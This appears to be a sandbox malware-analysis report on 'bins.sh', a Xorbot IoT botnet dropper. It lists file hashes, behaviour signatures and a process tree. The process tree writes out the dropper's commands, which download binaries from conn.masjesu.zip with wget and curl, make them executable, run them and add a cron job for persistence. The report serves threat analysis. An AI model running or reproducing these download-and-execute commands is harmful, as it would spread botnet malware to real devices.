Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    161s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    27/02/2025, 17:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    0aec7763cd1e0b0ff0816e8a61703e14

  • SHA1

    34d8cc1b3dde4180fc98bb42337526cd285596f7

  • SHA256

    3ee572774d84f42ca24f2f7e1d041f6c54a2b1595c83ba591c6f60af4f5095cb

  • SHA512

    5f0b46c702a374991819ff3d43141d24ad4b6bdbf112848d05cff833a9e37ed2e0f10dd9705e1da911c169a617fbd504806c616a73337888e4a54ee1366ff0b7

  • SSDEEP

    96:YaS+FFFlFcMLLnRL049GDLrHZcUlnBRn7NY8F7XsL3nL4qPjOxLwsOtJb3li6PQ0:lhaOGib0xCruW

Score
10/10
xorbotantivmbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (1792) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 2 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalation
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 7 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:650
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:652
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:658
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
        • Checks CPU configuration
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:720
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:753
      • /bin/chmod
        chmod 777 PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
        • File and Directory Permissions Modification
        PID:758
      • /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        ./PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
        2⤵
          PID:759
        • /bin/rm
          rm PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
          2⤵
            PID:761
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:762
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • Checks CPU configuration
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:765
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • System Network Configuration Discovery
            PID:767
          • /bin/chmod
            chmod 777 PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • File and Directory Permissions Modification
            PID:768
          • /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            ./PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
            2⤵
            • Renames itself
            • Reads runtime system information
            PID:769
            • /bin/sh
              sh -c "crontab -l"
              3⤵
                PID:771
                • /usr/bin/crontab
                  crontab -l
                  4⤵
                  • Reads runtime system information
                  PID:772
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:773
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    • Reads runtime system information
                    PID:774
              • /bin/rm
                rm PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
                2⤵
                  PID:776
                • /usr/bin/wget
                  wget http://conn.masjesu.zip/bins/Pms3WTDY7UrDojH8BdAAd4auYwS3NfuF2G
                  2⤵
                  • System Network Configuration Discovery
                  PID:779

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • /tmp/PXTdGD1o3YFHfbDwLYuRTyTyFDodeeWxJd
                Filesize

                177KB

                MD5

                786d75a158fe731feca3880f436082c0

                SHA1

                79ea2734e43d00cdeabed5586b2c1994d02aef3e

                SHA256

                5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                SHA512

                7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                Download Submit

              • /tmp/PqJSRmQESXaCxjKaH4rwrQqE0jxQgjhmZH
                Filesize

                98KB

                MD5

                5141342d0df8699fa32a6b066a0c592e

                SHA1

                8157673225bd5182f16215e2aa823a25ca2d4fbc

                SHA256

                54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                SHA512

                d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                Download Submit

              • /var/spool/cron/crontabs/tmp.AYgFvU
                Filesize

                210B

                MD5

                40b5cd85670ce6e237d162949f723e7a

                SHA1

                c58d70c98735cd0cbf2a4171bd4dc003e5af2f38

                SHA256

                516f5544af172b988d4775d9f9b8d5f63f8947d5fd2ec350fd87c10fdc69a059

                SHA512

                856b2f51564e7e712023c30876f80dfbec337cad1dc2bb15323bfd4615077f3a8222ee85827a49e84604cf5eb3ddbaccd7e70142e97a0a5650d6d2152780e6f2

                Download Submit